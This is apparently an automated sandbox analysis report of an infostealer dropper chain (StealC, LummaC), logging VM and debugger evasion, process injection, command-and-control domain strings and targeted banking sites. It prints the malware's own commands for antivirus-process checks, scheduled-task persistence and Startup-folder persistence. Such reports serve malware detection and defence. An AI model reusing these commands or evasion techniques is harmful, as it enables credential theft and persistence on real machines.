Source: svchost.exe, 00000003.00000002.3752518295.0000023C2967D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005857000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 550b7cfe5f.exe, 0000002A.00000002.3473998772.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000004.00000002.3749895131.0000020504AAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6000c298128b8c02a71a2474aeb5f3dc\|Virtual disk \|VMware
Source: svchost.exe, 00000008.00000002.3766906774.000002205F62B000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000002.3755458328.0000000001910000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2543272887.000001E286618000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000004.00000003.2435762552.0000020505340000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 550b7cfe5f.exe, 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wYcyBD74hgFSrUAP0/ypMI9rTGQDrKSl81mG0FZJNIeL
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: svchost.exe, 00000003.00000002.3750830465.0000023C29602000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: file.exe, 00000006.00000002.1376876736.0000000000BEA000.00000040.00000001.01000000.00000004.sdmp, axplong.exe, 00000009.00000002.1397229219.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 0000000A.00000002.1425116775.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3471962829.0000000000C56000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: svchost.exe, 00000003.00000002.3751595435.0000023C2962B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000003.00000002.3751892147.0000023C2964E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000004.00000002.3749895131.0000020504AAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk
Source: svchost.exe, 00000003.00000002.3752518295.0000023C29664000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_17-77360
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_17-77349
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_17-77346
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_17-78523
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_17-77368
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_17-77188
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_17-77389

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\file.exe

Code function: 6_2_04E10B42 Start: 04E10B4C End: 04E10B51

6_2_04E10B42

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: SIWVID

Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 6_2_04E10370 rdtsc

6_2_04E10370

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_0078AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

17_2_0078AD48

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_007745C0 VirtualProtect ?,00000004,00000100,00000000

17_2_007745C0

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

17_2_00789860

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C8645B mov eax, dword ptr fs:[00000030h]	13_2_00C8645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C8A1C2 mov eax, dword ptr fs:[00000030h]	13_2_00C8A1C2
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00789750 mov eax, dword ptr fs:[00000030h]	17_2_00789750

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_00787850 GetProcessHeap,HeapAlloc,GetUserNameA,

17_2_00787850

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0078AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_0078AD48
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0078CEEA SetUnhandledExceptionFilter,	17_2_0078CEEA
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0078B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_0078B33A
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C95AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_6C95AC62

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Memory written: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp	String found in binary or memory: scriptyprefej.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp	String found in binary or memory: navygenerayk.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp	String found in binary or memory: founpiuer.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp	String found in binary or memory: necklacedmny.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp	String found in binary or memory: thumbystriw.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp	String found in binary or memory: fadehairucw.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp	String found in binary or memory: crisiwarny.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp	String found in binary or memory: presticitpo.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp	String found in binary or memory: opinieni.store
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: servicedny.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: authorisev.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: faulteyotk.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dilemmadu.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: contemteny.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: goalyfeastz.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: opposezmny.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seallysl.site
Source: RDX123456.exe, 00000030.00000000.2294311234.00000000003C6000.00000002.00000001.01000000.0000001C.sdmp	String found in binary or memory: computeryrati.site

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_00789600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

17_2_00789600

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 451000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 466000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46D000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46E000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AF5008

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & echo url="c:\users\user\appdata\local\greentech dynamics\ecocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & exit
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & echo url="c:\users\user\appdata\local\greentech dynamics\ecocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & exit

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_6C9A4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

17_2_6C9A4760

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_6C881C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

17_2_6C881C30

Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000000.2135790083.0000000000336000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: axplong.exe, axplong.exe, 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 13_2_00C6D312 cpuid

13_2_00C6D312

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

17_2_00787B90

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
